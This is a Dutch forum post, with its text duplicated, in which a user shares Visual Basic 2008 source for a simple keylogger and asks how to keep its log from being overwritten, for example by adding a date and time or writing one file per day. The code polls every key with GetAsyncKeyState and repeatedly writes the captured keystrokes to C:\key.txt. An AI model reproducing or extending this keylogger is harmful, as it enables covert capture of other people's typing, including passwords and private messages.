DennisBosma
Gebruiker
- Lid geworden
- 4 sep 2009
Hallo,
Ik ben bezig met een Keylogger in Visual Basic 2008 die ik handmatig bij houd.
Alleen heb ik er een maar die slaat volgens mij niks of omdat het zo is ingesteld dat het bestand er over heen slaat, dus het staal niks op.
Is er een script waar voor ik dit kan stoppen? Dat het wel wordt opgeslagen maar dat er bijvoorbeeld eentijd + dag bij staat en er onder wat er in getypt, of elke keer een nieuw bestand per dag (minder handig denkt ik.)
Als je nog meet moet weten vraag het anders maar...
Code:
Alvast bedankt!:thumb:
Ik ben bezig met een Keylogger in Visual Basic 2008 die ik handmatig bij houd.
Alleen heb ik er een maar die slaat volgens mij niks of omdat het zo is ingesteld dat het bestand er over heen slaat, dus het staal niks op.
Is er een script waar voor ik dit kan stoppen? Dat het wel wordt opgeslagen maar dat er bijvoorbeeld eentijd + dag bij staat en er onder wat er in getypt, of elke keer een nieuw bestand per dag (minder handig denkt ik.)
Als je nog meet moet weten vraag het anders maar...
Code:
Code:
Public Class Form1
Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer
Dim result As Integer
Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
For i = 1 To 255
result = 0
result = GetAsyncKeyState(i)
If result = -32767 Then
TextBox1.Text = TextBox1.Text + Chr(i)
End If
Next i
End Sub
Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
Timer1.Start()
Timer2.Start()
End Sub
Private Sub Timer2_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer2.Tick
Dim key As New System.IO.StreamWriter("C:\key.txt")
key.Write(TextBox1.Text)
key.Close()
End Sub
End Class
Alvast bedankt!:thumb: